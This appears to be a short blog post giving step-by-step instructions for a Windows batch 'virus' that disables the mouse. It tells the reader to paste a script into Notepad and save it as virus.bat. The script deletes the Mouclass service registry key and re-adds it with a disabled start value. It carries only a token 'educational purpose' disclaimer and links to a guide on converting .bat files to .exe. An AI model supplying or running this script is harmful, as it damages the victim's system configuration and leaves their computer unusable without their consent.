How to Make a Virus that disable Mouse
How to Make a Virus that disable Mouse
how to make a virus that disable mouse...this is only for educational purpose and think before trying..:-
steps:
1.open notepad
2.copy the codes given below
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
3.save this file as virus.bat
4.done
Also See This How to Convert bat to exe File

Comments
Post a Comment